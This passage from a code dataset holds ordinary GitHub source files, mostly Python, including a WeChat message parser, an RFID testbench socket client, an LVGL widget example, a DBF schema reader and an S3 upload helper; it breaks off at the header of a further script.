+{"seq_id":"41050935219","text":"import xml.etree.ElementTree as ET\n\nclass Msg(object):\n    def __init__(self, xml_data):\n        self.ToUserName = xml_data.find('ToUserName').text\n        self.FromUserName = xml_data.find('FromUserName').text\n        self.CreateTime = xml_data.find('CreateTime').text\n        self.MsgType = xml_data.find('MsgType').text\n\n\nclass TextMsg(Msg):\n    def __init__(self, xml_data):\n        super(TextMsg, self).__init__(xml_data)\n        self.Content = xml_data.find('Content').text\n        self.MsgId = xml_data.find('MsgId').text\n\n\nclass EventMsg(Msg):\n    def __init__(self, xml_data):\n        super(EventMsg, self).__init__(xml_data)\n        self.Event = xml_data.find('Event').text\n\n\nclass EventSubscribeMsg(EventMsg):\n    \"\"\" Subscribe (follow) event message \"\"\"\n    def __init__(self, xml_data):\n        super(EventSubscribeMsg, self).__init__(xml_data)\n\n\nclass EventClickMsg(EventMsg):\n    \"\"\" Menu click event message \"\"\"\n    def __init__(self, xml_data):\n        super(EventClickMsg, self).__init__(xml_data)\n        self.EventKey = xml_data.find('EventKey').text\n\n\nclass EventViewMsg(EventMsg):\n    \"\"\" Menu view event message \"\"\"\n    def __init__(self, xml_data):\n        super(EventViewMsg, self).__init__(xml_data)\n        self.EventKey = xml_data.find('EventKey').text\n        self.MenuId = xml_data.find('MenuId').text\n\n\nclass MsgFactory(object):\n    @staticmethod\n    def parse_xml_string_to_msg(xml_string):\n        if len(xml_string) == 0:\n            return None\n        xml_data = ET.fromstring(xml_string)\n        msg_type = xml_data.find('MsgType').text\n        if msg_type == 'text':\n            return TextMsg(xml_data)\n        elif msg_type == 'event':\n            event_msg = EventMsg(xml_data)\n            if event_msg.Event == 'subscribe': # subscribe event message\n                return EventSubscribeMsg(xml_data)\n            elif event_msg.Event == 'CLICK': # menu click event\n                return EventClickMsg(xml_data)\n            elif event_msg.Event == \"VIEW\": # menu view event\n                return EventViewMsg(xml_data)\n\n        return None\n","repo_name":"yiyuhao/FukuanUnion","sub_path":"payserver/padmin/subscription_account_reply/wechat_msg.py","file_name":"wechat_msg.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"22804982544","text":"from pytopojson import identity\n\n\nclass Untransform(object):\n    def __init__(self):\n        self.identity = identity.Identity()\n        self.x_0 = 0\n        self.y_0 = 0\n        self.k_x = 0\n        self.k_y = 0\n        self.d_x = 0\n        self.d_y = 0\n\n    def __call__(self, transform=None, *args, **kwargs):\n        if transform 
is None:\n            return self.identity\n\n        self.k_x, self.k_y = transform[\"scale\"]\n        self.d_x, self.d_y = transform[\"translate\"]\n\n        return self.func\n\n    def func(self, input, i=None):\n        if i is None or i == 0:\n            self.x_0, self.y_0 = 0, 0\n        output = input.copy()\n\n        x_1 = int(round((input[0] - self.d_x) / self.k_x))\n        y_1 = int(round((input[1] - self.d_y) / self.k_y))\n        output[0] = x_1 - self.x_0\n        output[1] = y_1 - self.y_0\n        self.x_0 = x_1\n        self.y_0 = y_1\n\n        return output\n","repo_name":"fferrin/pytopojson","sub_path":"pytopojson/untransform.py","file_name":"untransform.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"7"}
+{"seq_id":"23444454673","text":"from init import *\r\nfrom mod1 import *\r\nimport sys\r\n\r\n\r\n\r\ndef main():\r\n    sys.stdout.write(\"\\033[2J\\033[H\")\r\n    sys.stdout.flush()\r\n    #array = [[O for i in range(32)] for j in range(16)] #32*16 array\r\n    wire = [0,0,2,0,0,1,[],[12,12],[12,12],[1,1,1],[1,1,1]]\r\n    #start/switch/player_now/wind_now/atkmode/pow/bullet_pos/HP1/HP2/skill_remain1/skill_remain2\r\n    data1 = [12,[1,1,1]] #HP/skill_remain\r\n    data2 = [12,[1,1,1]]\r\n\r\n    init(wire)\r\n    module1(wire,data1,data2)\r\n\r\nmain()\r\n","repo_name":"photon00/ICLab","sub_path":"python_simulation/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"17254417804","text":"import pygame.font\n\n\nclass Scoreboard():\n    # Class that displays score information\n    def __init__(self, ai_settings, screen, stats):\n        self.screen = screen\n        self.screen_rect = screen.get_rect()\n        self.ai_settings = ai_settings\n        self.stats = stats\n\n        # Font for displaying score information\n        self.text_color = (30, 30, 30)\n        self.font = pygame.font.SysFont(None,48)\n    # Prepare the initial score image\n    def prer_score(self):\n        '''Render the score as an image'''\n        rounded_score = int(round(self.stats.score,-1))\n        score_str = \"{:,}\".format(rounded_score)\n        self.score_image = self.font.render(score_str,True,self.text_color,self.ai_settings.bg_color)\n        # Put the score in the top-right corner\n        self.score_rect = self.score_image.get_rect()\n        self.score_rect.right = self.screen_rect.right - 20\n        self.score_rect.top = 20\n    def prer_score1(self):\n        '''High score'''\n        rounded_score = int(round(self.stats.h_score,-1))\n        score_str = \"{:,}\".format(rounded_score)\n        self.score_image = self.font.render(score_str,True,(80, 225, 30),self.ai_settings.bg_color)\n        # Put the high score at the bottom left\n        self.score_rect = self.score_image.get_rect()\n        self.score_rect.left = self.screen_rect.left + 20\n        self.score_rect.bottom = self.screen_rect.bottom\n    def show_score(self):\n        self.screen.blit(self.score_image,self.score_rect)\n","repo_name":"Aiden-Xu/ALIEN","sub_path":"scoreboard.py","file_name":"scoreboard.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"17435295945","text":"def solve(n):\n    dp = dict()\n    dp[0] = 0\n    dp[1] = 1\n    dp[2] = 2\n    dp[3] = 3\n    dp[4] = 4\n    dp[5] = 5\n    dp[6] = 6\n    for i in range(6, n+1):\n        dp[i] = max(dp[i-1]+1, dp[i-3]*2, dp[i-4]*3, dp[i-5]*4, dp[i-6]*5)\n    return dp[n]\n\ndef run():\n    import sys\n    read = sys.stdin.readline\n    n = int(read().replace(\"\\n\", \"\"))\n    print(solve(n))\n\nrun()\n# print(solve(10))","repo_name":"jeemyeong/problem-solving","sub_path":"src/boj/boj11058/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"}
+{"seq_id":"31790975965","text":"import logging\n\n\nloggers_dict = {}\n\n\ndef get_logger(name=None, console_level=logging.INFO):\n    global loggers_dict\n\n    if name is None:\n        name = \"BaseLogger\"\n\n    if name in loggers_dict:\n        logger = loggers_dict[name]\n    else:\n        logger = logging.getLogger(name)\n        logger.setLevel(logging.DEBUG)\n\n        file_handler = logging.FileHandler(f\"logs/runtime.log\", \"a\")\n        file_handler.setFormatter(logging.Formatter(\"%(asctime)s : %(levelname)s : %(name)s : %(message)s\"))\n        logger.addHandler(file_handler)\n\n        console_handler = logging.StreamHandler()\n        console_handler.setLevel(console_level)\n        console_handler.setFormatter(logging.Formatter(\"%(message)s\"))\n        logger.addHandler(console_handler)\n\n        loggers_dict[name] = logger\n\n    return logger\n","repo_name":"MB0390231/facebook_asset_performance_tracker_for_clickup","sub_path":"helpers/logging_config.py","file_name":"logging_config.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"19753131905","text":"#!/usr/bin/python3\nimport socket\nimport sys\nimport time\nimport os.path\nimport shutil\nfrom pathlib import Path\nimport csv\nimport datetime\nimport select\n\nCSVIN_HEADER = \"Motor Speed(rpm);Measure Time(sec);Measure Rep;RFID Power(dbm);\\n\"\nCSVIN_EXEMPLE = \"100;60;1;13;\\n\"\nCSV_DELIMITER = ';'\nCSV_EXEMPLE_FILE = \"exemple-csv-in.csv\"\nTMP_DIR = \".tmp\"\n\nHOST = '192.168.1.20'\nPORT = 12345\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nconnected = False\n\n#typedef enum {CMD_RFID=0, CMD_MOTOR, INFO_RFID, INFO_MOTOR} packet_type;\nCMD_RFID = 0x00\nCMD_MOTOR = 0x01\nINFO_RFID = 0x02\nINFO_MOTOR = 0x03\nRFID_DIRECT = 0x04\n\n#typedef enum {CMD_CHANGE_SPEED=0, CMD_GET_SPEED, CMD_SIGNAL_STABLE_SPEED} motor_cmd_type_t;\nCMD_SIGNAL_STABLE_SPEED = 0x02\n\n\nST_COM_WRITE_REG = 0x68\nCMD_TAG_DETECTED = 0x16\n\ndef csv_parser(csvPath):\n    with open(csvPath, 'r') as csvF:\n        rd = csv.DictReader(csvF, delimiter=';')\n        line = 0\n        skiped = 0\n        testlist = []\n        for row in rd:\n            line += 1\n            try:\n                d = dict()\n                d['testnum'] = line\n                speed = int(row['Motor Speed(rpm)'])\n                if not (100 <= speed <= 500) and (speed != 0): \n                    print(\"Warning: {}:{} the field 'Motor Speed(rpm)' need to be in range [100:500] rpm or 0 rpm -- skip test\".format(csvPath, line))\n                    skiped += 1\n                    continue\n                d['speed'] = speed\n                d['duration'] = int(row['Measure Time(sec)'])\n                d['repetition'] = int(row['Measure Rep'])\n\n                power = int(row['RFID Power(dbm)'])\n                if not (1 <= power <= 20):\n                    print(\"Warning: {}:{} the field 'RFID Power(dbm)' need to be in range [1:20] dbm -- skip test\".format(csvPath, line))\n                    skiped += 1\n                    continue\n                d['power'] = power \n                testlist.append(d)\n            except ValueError:\n                print(\"Warning: {}:{} contain a field that is not a number -- skip test\".format(csvPath, line))\n                skiped += 1\n                continue\n        \n        if(skiped):\n            print(\"{}/{} will be skiped. do you still want to proceed? (Yes/n)\".format(skiped, line))\n            if input() != \"Yes\":\n                exit()\n\n        return testlist\n\n# Write the result to the output csv file\ndef write_result(csvPath, result):\n    pass\n\n# Connect to the testbench server\ndef connect(addr, port):\n    global connected\n    try:\n        server.connect((addr, port))\n        server.setblocking(0)\n        print('Connection to ' + addr + ':' + str(port) + ' succeeded.')\n        connected = True\n    except ConnectionRefusedError:\n        print(\"Error: Could not connect to {}:{}. 
Make sure the server is started\".format(addr, port))\n        exit()\n\n# Disconnect from the testbench server\ndef disconnect():\n    global connected\n    print ('Disconnecting.')\n    if(connected):\n        server.close()\n        connected = False\n\n# Handle exiting potentially in the middle of a test, the scan, motor and server connection need to be stoped if possible\ndef cleanExit():\n    disconnect()\n    exit()\n\n# Get the following incoming cmd on the network\ndef get_cmd(): \n    cmd_detected = False\n    timeout = False\n    cmd_size = -1\n    cmd_type = -1\n    magic = 0\n    magic_detected = False\n    frame = []\n    cmd = dict()\n    while not cmd_detected:\n        ready = select.select([server], [], [], 0.5)\n        if ready[0]:\n            byte = server.recv(1)\n\n            value = int(byte[0])\n            #print('value:{}'.format(hex(byte[0])))\n            magic = ((magic>>8) | value<<24) & 0xFFFFFFFF\n            #print('magic is {}'.format(hex(magic)))\n            if(magic == 0x41421356):\n                magic_detected=True\n                continue\n            \n            if(magic_detected):\n                #print('value:{}'.format(hex(value)))\n                frame.append(value)\n\n                if(len(frame) == 3):\n                    cmd_type = frame[0]\n                    cmd_size = (frame[1] | frame[2]<<8) & 0xFFFF\n                    cmd[\"type\"] = cmd_type\n                    cmd[\"size\"] = cmd_size\n                    #print(\"size: \" + str(cmd_size))\n                elif(len(frame) > 3):\n                    cmd_size -=1\n                    if(cmd_size == 0):\n                        cmd_detected = True\n        else:\n            #print(\"timeout\")\n            timeout = True\n            return -1\n\n    #print(\"Command detected: {}\".format(frame))\n    cmd[\"data\"] = frame[3:]\n    \n    return cmd\n# Send the command to change the motor speed and wait until the speed as been reached\ndef motor_speed(speed):\n    clockwise = 1\n    if(speed<0):\n        speed = abs(speed)\n        clockwise = 0\n\n    # MAGIC type size type argc arg[...]\n    command_motor = bytes([ 0x41, 0x42, 0x13, 0x56, 1, 0, 5, 0, 3, speed>>8, speed&0xFF, clockwise])\n\n    n = server.send(command_motor)\n    if (n != len(command_motor)):\n        print ('Send error.')\n        cleanExit()\n\n    stabelised = False\n    while(not stabelised):\n        cmd = get_cmd()\n        if(cmd != -1 and cmd[\"type\"] == INFO_MOTOR and cmd[\"data\"][0] == CMD_SIGNAL_STABLE_SPEED):\n            stabelised = True\n\ndef dbm_to_reg(dbm):\n    value = 0\n    if(dbm >= 9):\n        value = 20-dbm\n    elif(dbm < 9):\n        value = 0x10 + (8-dbm)\n\n    #define ST25RU3993_REG_MODULATORCONTROL3_VALUE 0x00; // 0dB, 20dBm\n    #define ST25RU3993_REG_MODULATORCONTROL3_VALUE 0x07; // -7dB, 13dBm\n    #define ST25RU3993_REG_MODULATORCONTROL3_VALUE 0x08; // -8dB, 12dBm\n    #define ST25RU3993_REG_MODULATORCONTROL3_VALUE 0x09; // -9dB, 11dBm\n    #define ST25RU3993_REG_MODULATORCONTROL3_VALUE 0x0A; // -10dB, 10dBm\n    #define ST25RU3993_REG_MODULATORCONTROL3_VALUE 0x0B; // -11dB, 9dBm\n    #define ST25RU3993_REG_MODULATORCONTROL3_VALUE 0x10; // -12dB, 8dBm\n    #define ST25RU3993_REG_MODULATORCONTROL3_VALUE 0x11; // -13dB, 7dBm\n    #define ST25RU3993_REG_MODULATORCONTROL3_VALUE 0x12; // -14dB, 6dBm\n    #define ST25RU3993_REG_MODULATORCONTROL3_VALUE 0x13; // -15dB, 5dBm\n    #define ST25RU3993_REG_MODULATORCONTROL3_VALUE 0x14; // -16dB, 4dBm\n    #define ST25RU3993_REG_MODULATORCONTROL3_VALUE 0x15; // -17dB, 3dBm\n    #define ST25RU3993_REG_MODULATORCONTROL3_VALUE 0x16; // -18dB, 2dBm\n    #define ST25RU3993_REG_MODULATORCONTROL3_VALUE 0x17; // -19dB, 1dBm\n    return value\n\n# Send command to RFID board \ndef rfid_set(param, value):\n    command = []\n    if(param == \"scan\"): \n        # MAGIC type size type argc arg[...]\n        command = [ 0x41, 0x42, 0x13, 0x56, 0, 0, 3, 0x17, 1, 0]\n        if(value):\n            #print(\"Start scan\")\n            command[9] = 1\n        else:\n            #print(\"Stop scan\")\n            command[9] = 0\n\n    if(param == \"power\"):\n        reg = dbm_to_reg(value)\n        # MAGIC type size TID reserved payload 
protocol tx-msb-lsb rx-msb-lsb data[@ value] \n        command = [ 0x41, 0x42, 0x13, 0x56, RFID_DIRECT, 0, 11, 0x00, 0x00, 0x00,0x07, ST_COM_WRITE_REG, 0x00,0x02, 0x00,0x00, 0x15, reg]\n\n    n = server.send(bytes(command))\n    if (n != len(command)):\n        print ('Send error.')\n\ndef timestampMS():\n    return int((datetime.datetime.utcnow() - datetime.datetime(1970, 1, 1)).total_seconds() * 1000)\n\n# Start a test with the specified parameters\ndef start_test(params):\n    motor_speed(params[\"speed\"])\n    rfid_set(\"power\", params[\"power\"])\n    result = []\n\n    for rep in range(params[\"repetition\"]):\n        result.append([\"Repetition\",rep+1])\n        rfid_set(\"scan\", True)\n        #wait to make sure we get data straight away\n        #time.sleep(0.5)\n        \n        #start timer\n        start_time = timestampMS()\n        elapsed_time = timestampMS() - start_time\n        timestamp_first = 0\n\n        while(elapsed_time < params[\"duration\"]*1000):\n            elapsed_time = timestampMS() - start_time\n            #print(\"Elapsed time: {} sec\".format(elapsed_time))\n            # retrieve scan informations\n            cmd = get_cmd()\n            #print(\"type:{} sub-type:{} INFO_RFID:{} CMD_TAG_DETECTED:{}\".format(cmd[\"type\"], cmd[\"data\"][0], INFO_RFID, CMD_TAG_DETECTED))\n            if( cmd!= -1 and (cmd[\"type\"] == INFO_RFID) and (cmd[\"data\"][0] == CMD_TAG_DETECTED)):\n                timestamp = 0\n                for i,value in enumerate(cmd[\"data\"][1:8]):\n                    #print(\"value[{}]: {}\".format(i, hex(value)))\n                    timestamp = timestamp | (value << (i*8)) & 0xFFFFFFFFFFFFFFFF\n                tag = (cmd[\"data\"][9] | cmd[\"data\"][10] << 8) & 0xFFFF\n                \n                if timestamp_first == 0:\n                    timestamp_first = timestamp\n\n                timestamp -= timestamp_first\n\n                result.append([timestamp ,tag])\n                #print(\"Timestamp:{} tag:{}\".format(timestamp, tag))\n        \n\n        #stop scan\n        rfid_set(\"scan\", False)\n        result.append([\"\",\"\"])\n        time.sleep(1)\n        \n        #purge previous scan\n        while(get_cmd() != -1):\n            pass\n\n    # maybe reset to default state ?\n    \n    return result\n\ndef save_tmp(result, testlist):\n# print(\"save result\")\n    # create the file if it doesn't exist and append it if it does\n    with open(\"{}/tmp_{}.csv\".format(TMP_DIR,testlist[\"testnum\"]), 'w+') as resFile:\n        writer = csv.writer(resFile, delimiter=';')\n        writer.writerow([\"Test #{}\".format(testlist[\"testnum\"]),'','','','',''])\n        header = CSVIN_HEADER[:-1].split(';')\n        header.append('')\n        writer.writerow(header)\n        writer.writerow([testlist['speed'], testlist['duration'], testlist['repetition'], testlist['power'],'',''])\n        writer.writerow(['timer(ms)', 'RFID detection','','','',''])\n        for row in result:\n            row.extend(['','','',''])\n            writer.writerow(row)\n        resFile.close() \n\ndef clear_tmp_file():\n    if Path(TMP_DIR).is_dir():\n        shutil.rmtree(TMP_DIR)\n    os.makedirs(TMP_DIR)\n\ndef combine_tmp_file(csvOut):\n    path, dirs, files = next(os.walk(TMP_DIR))\n    file_count = len(files)\n    file_data = []\n    prepend_col = 0\n\n    for filenum in range(file_count):\n        file_path = \"{}/tmp_{}.csv\".format(TMP_DIR,filenum+1)\n\n        with open(file_path) as f:\n            rd = csv.reader(f)\n            for num, row in enumerate(rd):\n                try:\n                    file_data[num][0] += row[0]\n                except IndexError:\n                    row[0] = prepend_col*\";\" + row[0]\n                    file_data.append(row)\n\n        prepend_col += 5\n\n    with open(csvOut,'w+') as resfile:\n        wr = csv.writer(resfile)\n        for row in file_data:\n            wr.writerow(row)\n\n\n# Helper function to output an exemple csv input file with the correct format\ndef create_exemple():\n    with open(CSV_EXEMPLE_FILE, 'w') as exempleFile:\n        exempleFile.write(CSVIN_HEADER)\n        exempleFile.write(CSVIN_EXEMPLE)\n        exempleFile.close()\n\n#------------------- Entry point 
--------------------#\nsys.argv = [\".\\testbench.py\",\"exemple-csv-in.csv\",\"result.csv\"]\nif len(sys.argv) != 3:\n print(\"Wrong number of arguments\")\n print(\"Usage: {} .csv .csv\".format(sys.argv[0]))\n exit()\n\ncsvIn = sys.argv[1]\ncsvOut = sys.argv[2]\n\n# test if the CSV in file exist\ncsvInFile = Path(csvIn)\nif not csvInFile.is_file():\n print(\"Error: {} specified doesn't exist\".format(csvIn))\n exit()\n\n# test if the CSV in file is a CSV and is the correct version with (header)\nif not csvIn.endswith('.csv'):\n print(\"Error: {} is not a CSV file make sure the file ends with '.csv'\".format(csvIn))\n exit()\n\nwith open(csvIn, 'r') as csvInFile:\n # check header parameter match the expected format\n if csvInFile.readline() != CSVIN_HEADER:\n print(\"Error: The file {} doesn't match the expected format (checkout the file {})\".format(csvIn, CSV_EXEMPLE_FILE))\n create_exemple()\n exit()\n\n # check the delimiter match the expected delimiter\n csvInFile.seek(0)\n dialect = csv.Sniffer().sniff(csvInFile.read(1024))\n if dialect.delimiter != CSV_DELIMITER:\n print(\"Error: the CSV row delimiter doesn't match the expected delimiter '{}' (checkout the file {})\".format(CSV_DELIMITER, CSV_EXEMPLE_FILE))\n create_exemple()\n exit()\n\n csvInFile.close()\n\n# test if the CSV out file path specified exist\ncsvOutPath = os.path.dirname(os.path.abspath(csvOut))\nif not Path(csvOutPath).is_dir():\n print(\"Error: the output file can't be created because {} is not a valid path\".format(csvOutPath))\n exit()\n\n# test if the CSV out file doesn't exist (if so ask authorisation to overwrite) \nif Path(csvOut).is_file():\n print(\"Warning: {} already exist do you want to overwrite it? (Yes/n)\".format(csvOut))\n answ = input()\n if answ != \"Yes\":\n csvOut = datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d_%H:%M:%S_result.csv')\n print(\"The output file will be saved as {}\".format(csvOut))\n else:\n print(\"The file will be overwritten\")\n # truncate the file\n with open(csvOut, \"w\") as f:\n f.close\n\n #combine_tmp_file(csvOut)\n #exit()\ntry:\n testlist = csv_parser(csvIn)\n connect(HOST, PORT)\n clear_tmp_file()\n\n for test in testlist:\n print(\"Starting test {}/{} ... 
\".format(test[\"testnum\"],len(testlist)), end='', flush=True)\n result = start_test(test)\n print(\"Done\",end='',flush=True)\n save_tmp(result, test)\n print(\" - Saved\")\n \n motor_speed(0)\n combine_tmp_file(csvOut)\n disconnect()\n\nexcept KeyboardInterrupt:\n motor_speed(0)\n disconnect()\n","repo_name":"Ghom/Testbench_server","sub_path":"utils/testbench-win.py","file_name":"testbench-win.py","file_ext":"py","file_size_in_byte":14132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"14639024863","text":"def event_handler(evt):\n code = evt.get_code()\n obj = evt.get_target()\n\n if code == lv.EVENT.VALUE_CHANGED :\n id = obj.get_selected_btn()\n txt = obj.get_btn_text(id)\n\n print(\"%s was pressed\"%txt)\n\nbtnm_map = [\"1\", \"2\", \"3\", \"4\", \"5\", \"\\n\",\n \"6\", \"7\", \"8\", \"9\", \"0\", \"\\n\",\n \"Action1\", \"Action2\", \"\"]\n\nbtnm1 = lv.btnmatrix(lv.scr_act())\nbtnm1.set_map(btnm_map)\nbtnm1.set_btn_width(10, 2) # Make \"Action1\" twice as wide as \"Action2\"\nbtnm1.set_btn_ctrl(10, lv.btnmatrix.CTRL.CHECKABLE)\nbtnm1.set_btn_ctrl(11, lv.btnmatrix.CTRL.CHECKED)\nbtnm1.align(lv.ALIGN.CENTER, 0, 0)\nbtnm1.add_event_cb(event_handler, lv.EVENT.ALL, None)\n\n\n#endif\n","repo_name":"FASTSHIFT/X-TRACK","sub_path":"Software/X-Track/Simulator/LVGL.Simulator/lvgl/examples/widgets/btnmatrix/lv_example_btnmatrix_1.py","file_name":"lv_example_btnmatrix_1.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":4772,"dataset":"github-code","pt":"7"} +{"seq_id":"36870147978","text":"#GenomicRangeQuery\n\n# you can write to stdout for debugging purposes, e.g.\n# print(\"this is a debug message\")\n\ndef mapLetterToInt(letter):\n if letter == 'A':\n return 1\n elif letter == 'C':\n return 2\n elif letter == 'G':\n return 3\n else:\n return 4\n\ndef solution(S, P, Q):\n # write your code in Python 3.6\n S_array = list(S)\n result_array = list()\n counter = 0\n for left_limit in P:\n result_array.append(mapLetterToInt(min(S_array[left_limit:Q[counter]+1])))\n counter = counter + 1\n #print(str(result_array))\n return result_array\n","repo_name":"skymankarfield/randomAlgorithmDevPractice","sub_path":"GenomicRangeQuery.py","file_name":"GenomicRangeQuery.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"23197472466","text":"# -*- coding: latin-1 -*-\n\ndef dicNumeros( ) :\n numeros = \"\"\"DEFINE DBFBancos := 1\nDEFINE DBFClientes := 2\nDEFINE DBFCuentas := 3\nDEFINE DBFEmitidas := 4\nDEFINE DBFExApuntes := 5\nDEFINE DBFExPlantillas := 6\nDEFINE DBFExtras := 7\nDEFINE DBFIVA := 8\nDEFINE DBFMovBancos := 9\nDEFINE DBFOperaciones := 10\nDEFINE DBFPagos := 11\nDEFINE DBFParametros := 12\nDEFINE DBFProveedores := 13\nDEFINE DBFRecibidas := 14\nDEFINE DBFReferencias := 15\nDEFINE DBFRefApuntes := 16\nDEFINE DBFDiario := 17\nDEFINE DBFDiarioTxt := 18\nDEFINE DBFInformes := 19\nDEFINE DBFInfApun := 20\nDEFINE DBFVencimientos := 21\nDEFINE DBFERiva := 22\nDEFINE DBFFormDoc := 23\nDEFINE DBFFormHoja := 24\nDEFINE DBFTipoVtos := 25\nDEFINE DBFLBI := 26\nDEFINE DBFAjustes := 27\nDEFINE DBFArticulos := 28\nDEFINE DBFArticulosC := 29\nDEFINE DBFAlbEmi := 30\nDEFINE DBFAlbRec := 31\nDEFINE DBFAlbRep := 32\nDEFINE DBFAlbPre := 33\nDEFINE DBFAlbInv := 34\nDEFINE DBFApuntes := 35\nDEFINE DBFApuntesPre := 36\nDEFINE DBFFamilias := 37\nDEFINE DBFFamiliasC := 38\nDEFINE DBFDirectos := 
39\nDEFINE DBFAlbPed := 40\nDEFINE DBFEtiCod := 41\nDEFINE DBFEtiDat := 42\nDEFINE DBFRecibos := 43\nDEFINE DBFFotos := 44\nDEFINE DBFActividad := 45\nDEFINE DBFAnalitica := 46\nDEFINE DBFAlbPedE := 47\"\"\"\n\n d = {}\n for linea in numeros.split( \"\\n\" ) :\n linea = linea.strip()\n li = linea.split( \" := \" )\n numero = int(li[1].strip())\n alias = li[0][10:].strip().upper()\n d[alias] = numero\n return d\n\nclass Campo :\n def __init__( self, dato ) :\n li = dato.split( \",\" )\n self.nombre = li[0].replace( '\"', \"\" ).strip()\n self.tipo = li[1].replace( '\"', \"\" ).strip()\n self.tam = int(li[2])\n self.dec = int(li[3])\nclass Indice :\n def __init__( self, dato ) :\n li = dato.split( \",\" )\n self.nombre = li[0].replace( '\"', \"\" ).strip()\n self.expresion = \",\".join( li[3:] ).replace( '[', \"\" ).replace( ']', \"\" ).strip()[:-1]\n \n\nclass DBF :\n def __init__( self, nombre ) :\n self.nombre = nombre\n self.alias = nombre\n self.campos = []\n self.indices = []\n self.numero = 0\n\ndef leeINI() :\n f = open( \"c:/mgd/programa/ini30/_DBFs35r31.ini\", \"rt\" )\n\n liDBF = []\n for x in f :\n x = x.strip().replace( \" \", \"\" )\n if \"//\" in x :\n x = x[:x.find(\"//\")].strip()\n if x :\n if x[0] == \"[\" :\n cl = x.replace( \"[\", \"\" ).replace(\"]\",\"\")\n dbf = DBF( cl )\n liDBF.append(dbf)\n elif \"=\" in x :\n li = x.split( \"=\" )\n clave = li[0]\n valor = li[1]\n if clave.lower() == \"alias\" :\n dbf.alias = valor\n elif clave in [ \"Campo\", \"Cuenta\" ] :\n if valor.startswith( \"?\" ) :\n valor = valor[1:]\n dbf.campos.append( Campo(valor) )\n elif clave == \"Indice\" :\n dbf.indices.append( Indice(valor) )\n\n f.close()\n\n d = dicNumeros()\n\n for dbf in liDBF :\n if dbf.alias.lower() not in [ \"empresas\", \"pargen\", \"repform\" ] :\n dbf.numero = d[dbf.alias.upper()]\n\n return liDBF\n\n","repo_name":"juckar/extenmgd","sub_path":"bin/codigo/Enlace/gen/DBFs.py","file_name":"DBFs.py","file_ext":"py","file_size_in_byte":3207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"39529395810","text":"import shutil\nfrom gzip import GzipFile\nfrom io import BytesIO\n\nimport boto\nfrom boto.s3.connection import S3Connection\nfrom boto.s3.key import Key\n\nfrom config import AWS_ACCESS_KEY_ID, AWS_BUCKET, AWS_SECRET_ACCESS_KEY\n\n\nclass S3(object):\n _connection = None\n\n @property\n def connection(self):\n if not self._connection and not AWS_ACCESS_KEY_ID:\n return\n\n if not self._connection:\n self._connection = S3Connection(\n AWS_ACCESS_KEY_ID,\n AWS_SECRET_ACCESS_KEY,\n calling_format=boto.s3.connection.OrdinaryCallingFormat()\n )\n return self._connection\n\n def file_size(self, filename):\n bkt = self.connection.get_bucket(AWS_BUCKET, validate=False)\n key = bkt.lookup(filename)\n if not key:\n raise KeyError(filename)\n return key.size\n\n def key(self, filename):\n bkt = self.connection.get_bucket(AWS_BUCKET, validate=False)\n key = Key(bkt)\n key.key = filename\n return key\n\n def put(self, filename, data, content_type=None, **meta):\n if not self.connection:\n return None\n key = self.key(filename)\n if content_type:\n key.content_type = content_type\n for k, v in meta.items():\n key.set_metadata(k, v)\n key.set_contents_from_string(data)\n return key\n\n def get(self, filename):\n if not self.connection:\n return None\n key = self.key(filename)\n return key.read()\n\n def delete(self, filename):\n if not self.connection:\n return None\n\n key = self.key(filename)\n if key.exists():\n 
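# only issue the delete when the key actually exists on the bucket\n            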
key.delete()\n return True\n return False\n\n def public_url(self, filename, bucket_as_domain=True, protocol='https'):\n if bucket_as_domain:\n return f'{protocol}://{AWS_BUCKET}/{filename}'\n else:\n return self.key(filename).generate_url(expires_in=0, query_auth=False)\n\n def sign_url(self, filename, method='PUT', expire=600, headers=None):\n if not self.connection:\n return None\n\n return self.connection.generate_url(\n bucket=AWS_BUCKET,\n expires_in=expire,\n force_http=False,\n headers=headers,\n key=filename,\n method=method,\n query_auth=True,\n )\n\n def upload(\n self,\n filename,\n fileobj=None,\n gzip=False, # False or gzip compression level (0..9)\n content_type=None,\n signed_duration=36000,\n signed_method='GET',\n ):\n opened = False\n if not fileobj:\n fileobj = open(filename, 'r')\n opened = True\n\n try:\n if gzip in [None, False]:\n self.put(\n filename,\n fileobj.read(),\n content_type=content_type,\n **{'Content-Disposition': 'attachment; filename=' + filename}\n )\n else:\n if gzip is True:\n gzip = 7\n iofh = BytesIO()\n try:\n with GzipFile(filename, 'wb', gzip, iofh) as gzfileobj:\n shutil.copyfileobj(fileobj, gzfileobj)\n\n filename = '{}.gz'.format(filename)\n content_type = 'application/gzip'\n self.put(\n filename,\n iofh.getvalue(),\n content_type=content_type,\n **{'Content-Disposition': 'attachment; filename=' + filename}\n )\n finally:\n iofh.close()\n\n if signed_duration and signed_method:\n res = self.sign_url(filename, signed_method, signed_duration)\n return res\n\n return filename\n finally:\n if opened:\n fileobj.close()\n\n\ns3 = S3()\n","repo_name":"getdock/whitelist","sub_path":"app/upload/s3.py","file_name":"s3.py","file_ext":"py","file_size_in_byte":4049,"program_lang":"python","lang":"en","doc_type":"code","stars":106,"dataset":"github-code","pt":"7"} +{"seq_id":"5372472607","text":"# Author: Patrick Shapard\r\n# Created: 04/04/2020\r\n# Updated: 04/05/2020\r\n# This script is used 